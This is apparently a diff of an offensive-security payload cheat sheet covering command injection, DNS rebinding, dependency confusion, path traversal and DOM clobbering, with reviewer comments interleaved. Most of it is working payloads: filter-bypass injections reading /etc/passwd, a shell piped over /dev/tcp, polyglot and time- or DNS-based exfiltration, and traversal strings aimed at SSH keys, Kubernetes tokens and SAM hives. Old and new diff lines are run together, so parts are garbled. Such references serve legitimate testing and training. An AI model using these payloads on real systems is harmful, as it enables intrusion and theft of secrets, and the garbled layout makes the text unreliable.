In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands.
* `;` (Semicolon): Allows you to execute multiple commands sequentially.
* `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
* `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
* `&` (Background): Execute the command in the background, allowing the user to continue using the shell.
* `|` (Pipe): Takes the output of the first command and uses it as the input for the second command.
```powershell ```powershell
original_cmd_by_server; ls command1; command2 # Execute command1 and then command2
original_cmd_by_server && ls command1 && command2 # Execute command2 only if command1 succeeds
original_cmd_by_server | ls command1 || command2 # Execute command2 only if command1 fails
original_cmd_by_server || ls Only if the first cmd fail command1 & command2 # Execute command1 in the background
command1 | command2 # Pipe the output of command1 into command2
``` ```
### Argument Injection
Gain a command execution when you can only append arguments to an existing command.
Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/) to find the argument to inject to gain command execution.
* Chrome
```ps1
chrome '--gpu-launcher="id>/tmp/foo"'
```
* SSH
```ps1
ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
```
* psql
```ps1
psql -o'|id>/tmp/foo'
```
### Inside a command ### Inside a command
```bash * Command injection using backticks.
original_cmd_by_server `cat /etc/passwd` ```bash
original_cmd_by_server $(cat /etc/passwd) original_cmd_by_server `cat /etc/passwd`
``` ```
* Command injection using substitution
```bash
original_cmd_by_server $(cat /etc/passwd)
```
## Filter Bypasses ## Filter Bypasses
### Bypass without space ### Bypass without space
Works on Linux only. * `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a seperator in commands like `ls`, `wget`; use `${IFS}` instead.
```powershell
cat${IFS}/etc/passwd
ls${IFS}-la
```
* In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments.
```powershell
{cat,/etc/passwd}
```
* Input redirection. The < character tells the shell to read the contents of the file specified.
```powershell
cat</etc/passwd
sh</dev/tcp/127.0.0.1/4242
```
* ANSI-C Quoting
```powershell
X=$'uname\x20-a'&&$X
```
* The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value `09`.
```powershell
;ls%09-al%09/home
```
* In Windows, `%VARIABLE:~start,length%` is a syntax used for substring operations on environment variables.
```powershell
ping%CommonProgramFiles:~10,-18%127.0.0.1
ping%PROGRAMFILES:~10,-5%127.0.0.1
```
```powershell
swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab ~ $ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab ~ $ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab ~ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab ~ $ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab ~ $ sh</dev/tcp/127.0.0.1/4242
```
Commands execution without spaces, $ or { } - Linux (Bash only)
```powershell
IFS=,;`cat<<<uname,-a`
```
Works on Windows only.
```powershell
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
### Bypass with a line return ### Bypass with a line return
```powershell Commands can also be run in sequence with newlines
something%0Acat%20/etc/passwd
```bash
original_cmd_by_server
ls
``` ```
### Bypass with backslash newline
* Commands can be broken into parts by using backslash followed by a newline
```powershell
$ cat /et\
c/pa\
sswd
```
* URL encoded form would look like this:
```powershell
cat%20/et%5C%0Ac/pa%5C%0Asswd
```
### Bypass characters filter via hex encoding
```powershell
swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
### Bypass characters filter
Commands execution without backslash and slash - linux bash
```powershell
swissky@crashlab:~$ echo ${HOME:0:1}
/
swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/
swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/
swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
### Bypass Blacklisted words ### Bypass Blacklisted words
#### Bypass with single quote #### Bypass with single quote
```powershell ```powershell
w'h'o'am'i w'h'o'am'i
wh''oami
``` ```
#### Bypass with double quote #### Bypass with double quote
```powershell ```powershell
w"h"o"am"i w"h"o"am"i
wh""oami
```
#### Bypass with backticks
```powershell
wh``oami
``` ```
#### Bypass with backslash and slash #### Bypass with backslash and slash
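Review bot: the fences in this hunk are tagged `powershell` even where the content is bash-only (the `IFS=,` trick, the `\x2f...` hex-encoding block and the `${HOME:0:1}` block), while the newline example is tagged ```bash; tag each block with the shell it actually runs in, keeping `powershell` (or `cmd`) only for the `%CommonProgramFiles:~10,-18%` Windows example. The bare sentence "Works on Windows only." sits between two code blocks and should say what it refers to: the `%VAR:~start,len%` substring expansion of `cmd.exe`, which pulls a space out of an environment variable so no literal space is needed.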
@@ -131,14 +271,22 @@ w\ho\am\i
#### Bypass with $@ #### Bypass with $@
`$0`: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, `$0` will typically give the name of the shell.
```powershell ```powershell
who$@ami who$@ami
echo $0
-> /usr/bin/zsh
echo whoami|$0 echo whoami|$0
``` ```
#### Bypass with $()
```powershell
who$()ami
who$(echo am)i
who`echo am`i
```
#### Bypass with variable expansion #### Bypass with variable expansion
```powershell ```powershell
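Review bot: the heading is "Bypass with $@" but the added explanation only covers `$0`; add a sentence for `$@` itself, which expands to the positional parameters and therefore to nothing when none are set, so `who$@ami` is simply `whoami`. The `-> /usr/bin/zsh` line inside the code block mixes output into the command listing; a `# /usr/bin/zsh` comment after `echo $0` reads cleaner.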
@@ -156,31 +304,26 @@ powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
``` ```
## Challenge
Challenge based on the previous tricks, what does the following command do: ## Data Exfiltration
```powershell ### Time based data exfiltration
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
## Time based data exfiltration
Extracting data : char by char Extracting data : char by char
```powershell ```powershell
swissky@crashlab ~ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s real 0m5.007s
user 0m0.000s user 0m0.000s
sys 0m0.000s sys 0m0.000s
swissky@crashlab ~ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s real 0m0.002s
user 0m0.000s user 0m0.000s
sys 0m0.000s sys 0m0.000s
``` ```
## DNS based data exfiltration ### DNS based data exfiltration
Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
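Review bot: the `time if [ $(whoami|cut -c 1) == s ]` examples rely on bash's `[` builtin accepting `==`; POSIX `test`/`[` (for example under `dash`) only accepts `=`, so use `=` if the snippet is meant to work in `/bin/sh` as well. Nit: "Extracting data : char by char" has a stray space before the colon.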
@@ -199,29 +342,70 @@ Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca - dnsbin.zhack.ca
- pingb.in - pingb.in
## Polyglot command injection
## Polyglot Command Injection
A polyglot is a piece of code that is valid and executable in multiple programming languages or environments simultaneously. When we talk about "polyglot command injection," we're referring to an injection payload that can be executed in multiple contexts or environments.
* Example 1:
```powershell
Payload: 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
# Context inside commands with single and double quote:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
* Example 2:
```powershell
Payload: /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
# Context inside commands with single and double quote:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
```
## Tricks
### Backgrounding long running commands
In some instances, you might have a long running command that gets killed by the process injecting it timing out.
Using `nohup`, you can keep the process running after the parent process exits.
```bash ```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} nohup sleep 120 > /dev/null &
e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
``` ```
```bash ### Remove arguments after the injection
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
e.g: In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options.
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/' ## Labs
* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
## Challenge
Challenge based on the previous tricks, what does the following command do:
```powershell
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
``` ```
## References ## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) * [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192) * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)
* [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/)
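Review bot: the "Remove arguments after the injection" section states the `--` convention but gives no example of it, and "all arguments are treated as filenames and arguments, and not as options" should read "treated as operands rather than options"; it is also worth saying that `--` is honoured by getopt-style parsers (most GNU and POSIX utilities) and not by every program, so it is not a universal cut-off. In the `nohup sleep 120 > /dev/null &` example, stderr stays attached to the parent's descriptor, so `2>&1` belongs there if the intent is to fully detach.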

DNS Rebinding/README.md Normal file
@@ -0,0 +1,76 @@
# DNS Rebinding
> DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to make arbitrary requests to the target application and read their responses.
## Summary
* [Tools](#tools)
* [Exploitation](#exploitation)
* [Protection Bypasses](#protection-bypasses)
* [References](#references)
## Tools
- [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks.
- [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack)
## Exploitation
First, we need to make sure that the targeted service is vulnerable to DNS rebinding.
It can be done with a simple curl request:
```bash
curl --header 'Host: <arbitrary-hostname>' http://<vulnerable-service>:8080
```
If the server returns the expected result (e.g. the regular web page) then the service is vulnerable.
If the server returns an error message (e.g. 404 or similar), the server has most likely protections implemented which prevent DNS rebinding attacks.
Then, if the service is vulnerable, we can abuse DNS rebinding by following these steps:
1. Register a domain.
2. [Setup Singularity of Origin](https://github.com/nccgroup/singularity/wiki/Setup-and-Installation).
3. Edit the [autoattack HTML page](https://github.com/nccgroup/singularity/blob/master/html/autoattack.html) for your needs.
4. Browse to "http://rebinder.your.domain:8080/autoattack.html".
5. Wait for the attack to finish (it can take few seconds/minutes).
## Protection Bypasses
> Most DNS protections are implemented in the form of blocking DNS responses containing unwanted IP addresses at the perimeter, when DNS responses enter the internal network. The most common form of protection is to block private IP addresses as defined in RFC 1918 (i.e. 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Some tools allow to additionally block localhost (127.0.0.0/8), local (internal) networks, or 0.0.0.0/0 network ranges.
In the case where DNS protection are enabled (generally disabled by default), NCC Group has documented multiple [DNS protection bypasses](https://github.com/nccgroup/singularity/wiki/Protection-Bypasses) that can be used.
### 0.0.0.0
We can use the IP address 0.0.0.0 to access the localhost (127.0.0.1) to bypass filters blocking DNS responses containing 127.0.0.1 or 127.0.0.0/8.
### CNAME
We can use DNS CNAME records to bypass a DNS protection solution that blocks all internal IP addresses.
Since our response will only return a CNAME of an internal server,
the rule filtering internal IP addresses will not be applied.
Then, the local, internal DNS server will resolve the CNAME.
```bash
$ dig cname.example.com +noall +answer
; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer
;; global options: +cmd
cname.example.com. 381 IN CNAME target.local.
```
### localhost
We can use "localhost" as a DNS CNAME record to bypass filters blocking DNS responses containing 127.0.0.1.
```bash
$ dig www.example.com +noall +answer
; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer
;; global options: +cmd
localhost.example.com. 381 IN CNAME localhost.
```
## References
- [How Do DNS Rebinding Attacks Work? - nccgroup, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
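Review bot: the two `dig` transcripts are inconsistent with their own commands: the banner line shows `<<>> example.com` although the query was `cname.example.com`, and `dig www.example.com` is answered with `localhost.example.com. 381 IN CNAME localhost.`; the name in each command, banner and answer should match. The `curl --header 'Host: <arbitrary-hostname>'` check only shows that the service does not validate the Host header, which is the precondition for rebinding (and validating Host is the usual fix), so "then the service is vulnerable" claims more than the test establishes.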

@@ -0,0 +1,32 @@
# Dependency Confusion
> A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
## Summary
* [Tools](#tools)
* [Exploit](#exploitation)
* [References](#references)
## Tools
* [Confused](https://github.com/visma-prodsec/confused)
## Exploit
Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
### NPM example
* List all the packages (ie: package.json, composer.json, ...)
* Find the package missing from https://www.npmjs.com/
* Register and create a **public** package with the same name
* Package example : https://github.com/0xsapra/dependency-confusion-expoit
## References
* [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
* [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=zFHJwehpBrU )
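Review bot: the Summary entry `[Exploit](#exploitation)` points at an anchor that does not exist; the heading is `## Exploit`, so the link should be `#exploit`. Under "NPM example", `composer.json` is a PHP Composer manifest, not an npm one; either drop it or broaden the bullet to cover each ecosystem's manifest. Grammar: "with the same name of private one" should read "with the same name as the private one".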

@@ -129,4 +129,12 @@ C:\boot.ini
/../../../../../../../../../../../boot.ini%00.jpg /../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../ /.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

@@ -1,19 +1,23 @@
# Directory traversal # Directory Traversal
> A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. > Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Basic exploitation](#basic-exploitation) * [Basic exploitation](#basic-exploitation)
* [16 bits Unicode encoding](#) * [16 bits Unicode encoding](#16-bits-unicode-encoding)
* [UTF-8 Unicode encoding](#) * [UTF-8 Unicode encoding](#utf-8-unicode-encoding)
* [Bypass "../" replaced by ""](#) * [Bypass "../" replaced by ""](#bypass--replaced-by-)
* [Double URL encoding](#) * [Bypass "../" with ";"](#bypass--with-)
* [Double URL encoding](#double-url-encoding)
* [UNC Bypass](#unc-bypass) * [UNC Bypass](#unc-bypass)
* [NGINX/ALB Bypass](#nginxalb-bypass)
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
* [Path Traversal](#path-traversal) * [Path Traversal](#path-traversal)
* [Interesting Linux files](#) * [Interesting Linux files](#interesting-linux-files)
* [Interesting Windows files](#) * [Interesting Windows files](#interesting-windows-files)
* [References](#references)
## Tools ## Tools
@@ -55,13 +59,22 @@ We can use the `..` characters to access the parent directory, the following str
``` ```
### Bypass "../" replaced by "" ### Bypass "../" replaced by ""
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them.
```powershell ```powershell
..././ ..././
...\.\ ...\.\
``` ```
### Bypass "../" with ";"
```powershell
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
```
### Double URL encoding ### Double URL encoding
```powershell ```powershell
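Review bot: the new section "Bypass "../" with ";"" gives the `..;/` payload without the reason it works: Java servlet containers such as Tomcat and Jetty treat `;` as the start of a URL path parameter and strip `;...` from each segment before normalising the path, so `..;/` looks like a harmless segment to a front proxy or filter but becomes `../` in the backend; one sentence saying so also tells the defender that the fix is to normalise identically on both sides or reject `;` in paths.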
@@ -70,6 +83,9 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
\ = %255c \ = %255c
``` ```
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
### UNC Bypass ### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
@@ -79,6 +95,40 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
``` ```
### NGINX/ALB Bypass
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
```http://nginx-server/../../``` will return a 400 bad request.
To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```
### ASPNET Cookieless Bypass
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
We can use this behavior to bypass filtered URLs.
```powershell
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
/(S(X))/admin/(S(X))/main.aspx
```
### Java Bypass
Bypass Java's URL protocol
```powershell
url:file:///etc/passwd
url:http://127.0.0.1:8080
```
## Path Traversal ## Path Traversal
### Interesting Linux files ### Interesting Linux files
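Review bot: the "Java Bypass" section lists `url:file:///etc/passwd` with no explanation of what the `url:` prefix is or which check it gets past; a sentence naming the parser or filter it applies to is needed, otherwise the reader cannot tell when it is relevant. Style: the NGINX examples use triple backticks inline (```http://nginx-server/../../```) where single backticks are meant, and "in the route, For example:" needs a lower-case "for".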
@@ -105,11 +155,25 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
/proc/self/cwd/main.py /proc/self/cwd/main.py
/home/$USER/.bash_history /home/$USER/.bash_history
/home/$USER/.ssh/id_rsa /home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount /var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
``` ```
### Interesting Windows files ### Interesting Windows files
Always existing file in recent Windows machine.
Ideal to test path traversal but nothing much interesting inside...
```powershell
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
```
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
```powershell ```powershell
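Review bot: `/run/secrets/kubernetes.io/serviceaccount/certificate` is not a file the service-account volume provides; the projected volume contains `token`, `namespace` and `ca.crt`, so the third entry should be `ca.crt`. "Always existing file in recent Windows machine." should read "Files that always exist on recent Windows machines", since the block lists two.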
@@ -133,6 +197,8 @@ c:/unattend.txt
c:/unattend.xml c:/unattend.xml
c:/unattended.txt c:/unattended.txt
c:/unattended.xml c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
``` ```
The following log files are controllable and can be included with an evil payload to achieve a command execution The following log files are controllable and can be included with an evil payload to achieve a command execution
@@ -150,7 +216,23 @@ The following log files are controllable and can be included with an evil payloa
/var/log/mail /var/log/mail
``` ```
## Labs
* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
## References ## References
* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)

Dom Clobbering/README.md Normal file
@@ -0,0 +1,132 @@
# Dom Clobbering
> DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities.
## Summary
* [Lab](#lab)
* [Exploit](#exploit)
* [References](#references)
## Lab
* [Lab: Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering)
* [Lab: Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters)
* [Lab: DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/)
## Exploit
Exploitation requires any kind of `HTML injection` in the page.
* Clobbering `x.y.value`
```html
// Payload
<form id=x><output id=y>I've been clobbered</output>
// Sink
<script>alert(x.y.value);</script>
```
* Clobbering `x.y` using ID and name attributes together to form a DOM collection
```html
// Payload
<a id=x><a id=x name=y href="Clobbered">
// Sink
<script>alert(x.y)</script>
```
* Clobbering `x.y.z` - 3 levels deep
```html
// Payload
<form id=x name=y><input id=z></form>
<form id=x></form>
// Sink
<script>alert(x.y.z)</script>
```
* Clobbering `a.b.c.d` - more than 3 levels
```html
// Payload
<iframe name=a srcdoc="
<iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>"></iframe>
<style>@import '//portswigger.net';</style>
// Sink
<script>alert(a.b.c.d)</script>
```
* Clobbering `forEach` (Chrome only)
```html
// Payload
<form id=x>
<input id=y name=z>
<input id=y>
</form>
// Sink
<script>x.y.forEach(element=>alert(element))</script>
```
* Clobbering `document.getElementById()` using `<html>` or `<body>` tag with the same `id` attribute
```html
// Payloads
<html id="cdnDomain">clobbered</html>
<svg><body id=cdnDomain>clobbered</body></svg>
// Sink
<script>
alert(document.getElementById('cdnDomain').innerText);//clobbbered
</script>
```
* Clobbering `x.username`
```html
// Payload
<a id=x href="ftp:Clobbered-username:Clobbered-Password@a">
// Sink
<script>
alert(x.username)//Clobbered-username
